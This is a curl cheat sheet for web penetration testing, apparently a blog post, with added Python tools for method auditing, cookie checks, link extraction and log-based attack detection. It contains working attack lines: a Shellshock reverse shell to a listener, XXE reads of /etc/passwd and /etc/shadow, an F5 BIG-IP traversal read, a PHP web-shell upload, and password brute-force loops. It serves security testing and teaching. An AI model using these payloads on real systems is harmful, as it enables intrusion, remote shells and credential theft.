Web Penetration Testing with Curl Cheatsheet

In a lot of scenarios we do not have GUI access to the web application, but in most cases curl is installed on the test machine, so below is a simple cheat sheet for running basic checks with it.

#GET request using curl (-i also prints the response headers; -I would send a HEAD request instead, see below)
curl -i http://10.10.10.10

# Send Post Request
curl --data "param1=value1&param2=value2" http://10.10.10.10

#Check for Trace Method
curl -k -v -X TRACE http://10.10.10.10

#PUT Request 
curl -X PUT -d "PUT request data" http://10.10.10.10
curl -kL https://10.10.10.10 -T file.txt

#HEAD Request 
curl -I http://10.10.10.10

#Test DEBUG Method --> if Response "OK" --> DEBUG is enabled
curl -X DEBUG https://10.10.10.10 -k -v -H "Command: stop-debug"

#Ignore SSL certificate errors (only relevant for https:// URLs)
curl -k https://10.10.10.10

#Follow Redirection 
curl -L http://10.10.10.10

#Add headers in a JSON GET request 
curl -i -H "Accept: application/json" -H "Content-Type: application/json" http://10.10.10.10

#Add headers to an XML GET request 
curl -H "Accept: application/xml" -H "Content-Type: application/xml" -X GET http://10.10.10.10

#XML POST request 
curl -k -X POST -H "Content-Type: application/xml" -H "Accept: application/xml" -d "<Request><Login>my_login</Login><Password>my_password</Password></Request>" https://10.10.10.10

#File upload: send the file contents as the POST body (--data-binary keeps newlines; -d strips them; -F "file=@filename" would send a multipart form upload instead)
curl -X POST --data-binary @filename http://10.10.10.10

#Proxy testing (send the request through the proxy at 10.10.10.10:443)
curl -kL https://google.com --proxy http://10.10.10.10:443
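The method checks above (HEAD, OPTIONS, TRACE, PUT, DEBUG) can be run as a single audit. The following is an added example written for this cheat sheet, not code from the original page or from curl: it starts a small constructed test target on loopback that deliberately leaves TRACE and PUT enabled, probes each method the same way the curl -X lines do, and reports any risky method that answers with a non-error status. The target, the method list and the risk descriptions are assumptions made for the demonstration; audit_methods() takes any host and port.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Methods the cheat sheet probes one by one with "curl -X <METHOD>".
PROBED_METHODS = ("GET", "HEAD", "OPTIONS", "TRACE", "PUT", "DELETE", "DEBUG")

# Assumed risk descriptions: any of these answering with a non-error status is a finding.
RISKY_METHODS = {
    "TRACE": "TRACE echoes requests back (cross-site tracing exposure)",
    "PUT": "PUT accepted (unrestricted upload)",
    "DELETE": "DELETE accepted (unrestricted deletion)",
    "DEBUG": "DEBUG accepted (ASP.NET debugging left enabled)",
}


class DemoTarget(BaseHTTPRequestHandler):
    """Constructed local target that deliberately leaves TRACE and PUT enabled."""

    def log_message(self, *args):  # keep the demo quiet
        pass

    def _reply(self, code, body=b""):
        self.send_response(code)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        if self.command != "HEAD":
            self.wfile.write(body)

    def do_GET(self):
        self._reply(200, b"hello")

    def do_HEAD(self):
        self._reply(200)

    def do_OPTIONS(self):
        self.send_response(204)
        self.send_header("Allow", "GET, HEAD, OPTIONS, TRACE, PUT")
        self.end_headers()

    def do_TRACE(self):
        # Reflecting the request line and headers is exactly what makes TRACE a finding.
        echo = (self.requestline + "\r\n" + str(self.headers)).encode()
        self._reply(200, echo)

    def do_PUT(self):
        self.rfile.read(int(self.headers.get("Content-Length", 0)))
        self._reply(201)
    # Any other method (DELETE, DEBUG, ...) falls through to the handler's 501 default.


def probe_method(host, port, method, path="/"):
    """Send one request with the given method; return (status, body)."""
    conn = http.client.HTTPConnection(host, port, timeout=3)
    body = b"probe" if method in ("PUT", "POST") else None
    conn.request(method, path, body=body, headers={"X-Probe": "curl-cheatsheet"})
    resp = conn.getresponse()
    data = resp.read()
    conn.close()
    return resp.status, data


def audit_methods(host, port):
    """Probe every method; return ({method: status}, [human-readable findings])."""
    statuses = {}
    findings = []
    for method in PROBED_METHODS:
        status, data = probe_method(host, port, method)
        statuses[method] = status
        if method in RISKY_METHODS and status < 400:
            note = RISKY_METHODS[method]
            if method == "TRACE" and b"X-Probe" in data:
                note += ", request headers reflected"
            findings.append(f"{method} -> {status}: {note}")
    return statuses, findings


def run_demo():
    """Start the constructed target on a free loopback port, audit it, shut it down."""
    server = HTTPServer(("127.0.0.1", 0), DemoTarget)
    port = server.server_address[1]
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return audit_methods("127.0.0.1", port)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    statuses, findings = run_demo()
    print(statuses)
    print("\n".join(findings) or "no risky methods enabled")
```

On a hardened server TRACE, DELETE and DEBUG should come back as 405 or 501; on Apache httpd, TraceEnable off is the directive that turns TRACE off.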

Login and Session Management using CURL 
#GET request Login using Curl 
curl --user user:pass http://10.10.10.10
curl -u user:pass http://10.10.10.10

#JSON POST Request Login 
curl -X POST https://10.10.10.10 -H "Content-Type: application/json" -d '{"login":"my_login","password":"my_password"}' --user "login:password"

#Curl POST Request 
curl -X POST https://10.10.10.10 -H "Content-Type: application/json" -d '{"productId": 123456, "quantity": 100}'  
curl -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "param1=value1&param2=value2"  https://10.10.10.10 

#Save the session cookies to a cookie jar file 
curl --user user:pass --cookie-jar ./somefile https://10.10.10.10

#Reuse the saved session cookies
curl --cookie ./somefile  https://10.10.10.10

#Login with Authorization: Basic
curl http://10.10.10.10/console --basic -v -u root:root  

#Login with Digest Authorization 
curl -v --digest --user 'admin:admin' http://10.10.10.10/console

#Upload a file using PUT method
curl -v -X PUT -d '<?php system ($_GET["cmd"]); ?>' http://10.10.10.10/test/shell.php 
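Once --cookie-jar has written a session to disk, the file itself is worth a look: the Netscape cookie format curl uses records the Secure flag and the expiry per cookie, and marks HttpOnly cookies with a #HttpOnly_ prefix on the domain field. The parser and audit below are an added example for this page, not curl's own code; the jar contents are a constructed sample, and the list of name fragments used to recognise session cookies is an assumption.

```python
import time

# Constructed sample of what "curl --cookie-jar ./somefile" writes (tab-separated records).
SAMPLE_JAR = """# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.

#HttpOnly_10.10.10.10\tFALSE\t/\tTRUE\t0\tJSESSIONID\tA1B2C3D4E5F6
10.10.10.10\tFALSE\t/\tFALSE\t4102444800\tremember_me\tabc123
.example.com\tTRUE\t/\tTRUE\t0\tauth_token\tdeadbeef
"""

# Field order of one record: domain, include-subdomains flag, path, secure flag, expiry, name, value
FIELDS = ("domain", "include_subdomains", "path", "secure", "expires", "name", "value")

# Assumed name fragments that usually identify a session or authentication cookie.
SESSION_NAMES = ("sess", "session", "auth", "token", "remember", "jsessionid", "phpsessid")


def parse_cookie_jar(text):
    """Parse Netscape cookie-jar text into a list of dicts (one per cookie)."""
    cookies = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        httponly = line.startswith("#HttpOnly_")
        if httponly:
            line = line[len("#HttpOnly_"):]   # the rest of the line is a normal record
        elif line.startswith("#"):
            continue                           # ordinary comment line
        parts = line.split("\t")
        if len(parts) != len(FIELDS):
            continue                           # not a cookie record
        rec = dict(zip(FIELDS, parts))
        rec["include_subdomains"] = rec["include_subdomains"] == "TRUE"
        rec["secure"] = rec["secure"] == "TRUE"
        rec["expires"] = int(rec["expires"])   # 0 means a session cookie
        rec["httponly"] = httponly
        cookies.append(rec)
    return cookies


def audit_cookies(cookies, now=None):
    """Return a list of weaknesses in the saved cookies' attributes."""
    now = time.time() if now is None else now
    issues = []
    for c in cookies:
        name = c["name"]
        session_like = any(k in name.lower() for k in SESSION_NAMES)
        if not c["secure"]:
            issues.append(f"{name}: missing Secure flag (sent over plain HTTP)")
        if session_like and not c["httponly"]:
            issues.append(f"{name}: session cookie without HttpOnly")
        if session_like and c["expires"]:
            days = (c["expires"] - now) / 86400
            issues.append(f"{name}: persistent session cookie, expires in {days:.0f} days")
        if session_like and c["include_subdomains"]:
            issues.append(f"{name}: session cookie shared with all subdomains of {c['domain']}")
    return issues


if __name__ == "__main__":
    for issue in audit_cookies(parse_cookie_jar(SAMPLE_JAR)):
        print(issue)
```

Run it against a real jar with parse_cookie_jar(open("./somefile").read()); the findings map directly to the Set-Cookie attributes (Secure, HttpOnly, Max-Age/Expires, Domain) the application should be setting.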

Information Gathering using CURL

#Iterate a number from 1 to 20 in the URL and compare the page titles to spot differences 
for i in $(seq 1 20); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep '<title>';done

#Get all the links from a page 
curl 10.11.1.71 -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'

#Get the page text in a more readable format (requires html2text) 
curl 10.11.1.71 -s -L | html2text -width '99' | uniq 
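The grep/sed pipeline above works on well-formatted HTML but breaks on minified pages and leaves relative URLs unresolved. The following is an added example (not from the original page) that does the same job with Python's html.parser: it collects the title plus every href, src and action target, resolves them against the page URL (honouring a <base> tag), and separates same-host links from external ones. The HTML is a constructed sample; when stdin is a pipe it reads the page from there instead, so curl -sL URL | python3 links.py URL feeds it a live page.

```python
import sys
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed sample page; PAGE_URL is the address it was fetched from.
PAGE_URL = "http://10.11.1.71/"
SAMPLE_HTML = """<html><head><title> Jobs Portal </title>
<base href="/app/">
<script src="https://cdn.example.net/lib.js"></script></head>
<body>
<a href="login.php">Login</a>
<a href="/index.php/jobs/apply/1/">Apply</a>
<a href="http://10.11.1.71/admin/">Admin</a>
<a href="https://partner.example.org/">Partner</a>
<a href="mailto:hr@example.org">Mail</a>
<form action="upload.php" method="post"><input type="file" name="f"></form>
<img src="/static/logo.png">
</body></html>"""


class LinkCollector(HTMLParser):
    """Collect the <title> and every href/src/action target, resolved against the page URL."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.title = ""
        self._in_title = False
        self.links = []          # list of (tag, absolute_url)

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "title":
            self._in_title = True
            return
        if tag == "base" and attrs.get("href"):
            # <base> changes how every later relative URL resolves.
            self.base_url = urljoin(self.base_url, attrs["href"])
            return
        for attr in ("href", "src", "action"):
            if attrs.get(attr):
                self.links.append((tag, urljoin(self.base_url, attrs[attr])))

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data.strip()


def extract_links(html, page_url):
    """Return (title, [(tag, absolute_url), ...]) for one HTML document."""
    parser = LinkCollector(page_url)
    parser.feed(html)
    parser.close()
    return parser.title, parser.links


def split_by_host(links, page_url):
    """Split resolved links into (same-host, external), each sorted and de-duplicated."""
    host = urlparse(page_url).netloc
    same, external = set(), set()
    for _tag, url in links:
        (same if urlparse(url).netloc == host else external).add(url)
    return sorted(same), sorted(external)


if __name__ == "__main__":
    url = sys.argv[1] if len(sys.argv) > 1 else PAGE_URL
    html = SAMPLE_HTML if sys.stdin.isatty() else sys.stdin.read()
    title, links = extract_links(html, url)
    same, external = split_by_host(links, url)
    print(f"title: {title}")
    print("same host:\n  " + "\n  ".join(same))
    print("external:\n  " + "\n  ".join(external))
```

Keeping the tag alongside each URL lets you pull out just the form actions or script sources later; the mailto: entry ends up in the external list because it has no host.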

#Find hosts that answer 401 Unauthorized (Basic auth prompt) on ports 80 and 8080 across 100.64.0.0-100.127.255.255 (requires GNU parallel and bash)
parallel -j250 'if [[ "`timeout 3 curl -v 100.{3}.{1}.{2}:80 2> >(grep -o -i -E Unauthorized) > /dev/null`" ]]; then echo 100.{3}.{1}.{2}; fi; if [[ "`timeout 3 curl -v 100.{3}.{1}.{2}:8080 2> >(grep -o -i -E Unauthorized) > /dev/null`" ]]; then echo 100.{3}.{1}.{2}:8080; fi' ::: {1..255} ::: {1..255} ::: {64..127} > auth_basic.txt

Exploitation

#Exploiting ShellShock using CURL
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.10.10.10/9001 0>&1 " http://10.10.10.2:80/cgi-bin/user.sh

#XXE - when you find a /soap or /soap/servlet/rpcrouter directory (first two payloads read a local file, the third tests an outbound fetch)
curl -kL -H "Content-Type:text/xml" http://10.10.10.10:8080/soap/servlet/rpcrouter -X POST -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <faultactor>&xxe;</faultactor>'

curl -kL -H "Content-Type:text/xml" http://10.10.10.10:8080/soap/servlet/rpcrouter -X POST -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/shadow"> ]> <faultactor>&xxe;</faultactor>'

curl -kL -H "Content-Type:text/xml" http://10.10.10.10:8080/soap/servlet/rpcrouter -X POST -d '<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY test SYSTEM "https://mail.google.com"> ]> <faultactor>&test;</faultactor>'

#LFI on Apache httpd (F5 BIG-IP load balancer)
curl -kL --cipher 'DEFAULT:!DH' 'https://10.10.10.10/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'

Brute forcing using Curl

#One liner (reads the wordlist line by line so passwords containing spaces survive; prints the response body and then the password tried)
while read -r pass; do curl -k https://10.10.10.10 -u root:"$pass"; echo "$pass"; done < /usr/share/wordlists/rockyou.txt

#Better for readability (a status other than 401 means the credentials were accepted; 000 means curl could not connect)
while read -r pass; do
	http_code=$(curl https://10.10.10.10 -k --digest -u admin:"$pass" -w '%{http_code}' -o /dev/null -s)
	if [[ $http_code -ne 401 && $http_code -ne 000 ]]; then
		echo "Password Cracked: $pass"
		break
	else
		echo "Wrong Password: '$pass' --- '$http_code'"
	fi
done < /usr/share/wordlists/rockyou.txt
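Seen from the server side, every request shape in the Exploitation and Brute forcing sections above leaves a trace in the access log. The following is an added example written for this page (not from the original author) showing the detection counterpart: it parses Apache combined-format log lines, flags the "() {" function prelude the Shellshock header starts with, the "..;/" traversal sequence from the BIG-IP request, TRACE/DEBUG methods, and bursts of 401 responses to one path from one source, which is what the wordlist loops above produce. The log lines are constructed samples; the 401 threshold and time window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache/nginx "combined" log format: ip ident user [time] "method path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Signatures derived from the request shapes in this cheat sheet.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")                        # the "() {" function prelude
TRAVERSAL_RE = re.compile(r"(?:\.\.|%2e%2e)(?:;|/|%2f)", re.I)   # "..;/" as well as plain "../"
UNSAFE_METHODS = {"TRACE", "DEBUG"}

# Constructed sample log: one benign hit, three attack shapes, then a 12-request 401 burst.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Oct/2023:13:55:40 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 0 "-" "() { :; }; echo vulnerable"',
    '198.51.100.9 - - [10/Oct/2023:13:55:41 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1843 "-" "curl/7.88.1"',
    '198.51.100.7 - - [10/Oct/2023:13:55:42 +0000] "TRACE / HTTP/1.1" 200 120 "-" "curl/7.88.1"',
] + [
    f'203.0.113.5 - - [10/Oct/2023:13:56:{i:02d} +0000] "GET /console HTTP/1.1" 401 0 "-" "curl/7.88.1"'
    for i in range(12)
]


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    entry["ts"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return entry


def classify(entry):
    """Return the list of signature names that match one log entry."""
    tags = []
    if SHELLSHOCK_RE.search(entry["ua"]) or SHELLSHOCK_RE.search(entry["referer"]):
        tags.append("shellshock")
    if TRAVERSAL_RE.search(entry["path"]):
        tags.append("path-traversal")
    if entry["method"] in UNSAFE_METHODS:
        tags.append("dangerous-method")
    return tags


def brute_force_sources(entries, threshold=10, window_seconds=60):
    """Return (ip, path) pairs with at least `threshold` 401s inside `window_seconds`.

    Both numbers are assumed tuning values; a real deployment picks them per application.
    """
    by_key = defaultdict(list)
    for e in entries:
        if e["status"] == 401:
            by_key[(e["ip"], e["path"])].append(e["ts"])
    hits = []
    for key, times in by_key.items():
        times.sort()
        # Sliding window: any run of `threshold` consecutive 401s that fits in the window.
        for i in range(len(times) - threshold + 1):
            if (times[i + threshold - 1] - times[i]).total_seconds() <= window_seconds:
                hits.append(key)
                break
    return hits


def analyze(lines):
    """Parse all lines; return ([(ip, path, tags)], [(ip, path)]) for signature and burst hits."""
    entries = [e for e in map(parse_line, lines) if e]
    tagged = []
    for e in entries:
        tags = classify(e)
        if tags:
            tagged.append((e["ip"], e["path"], tags))
    return tagged, brute_force_sources(entries)


if __name__ == "__main__":
    tagged, bursts = analyze(SAMPLE_LOG)
    for ip, path, tags in tagged:
        print(f"{ip} {path} -> {', '.join(tags)}")
    for ip, path in bursts:
        print(f"{ip} -> repeated 401s on {path} (possible credential guessing)")
```

The signature checks are deliberately narrow so they can be dropped into an existing log pipeline without a flood of false positives; the 401-burst check is the one that catches the curl loops above regardless of which wordlist they use.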

OpenSSL Errors

#Resolving "SSL routines::dh key too small" (exclude the DH cipher suites so OpenSSL accepts the server's weak DH key)
curl https://10.10.10.10 -kL --cipher 'DEFAULT:!DH'


Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.
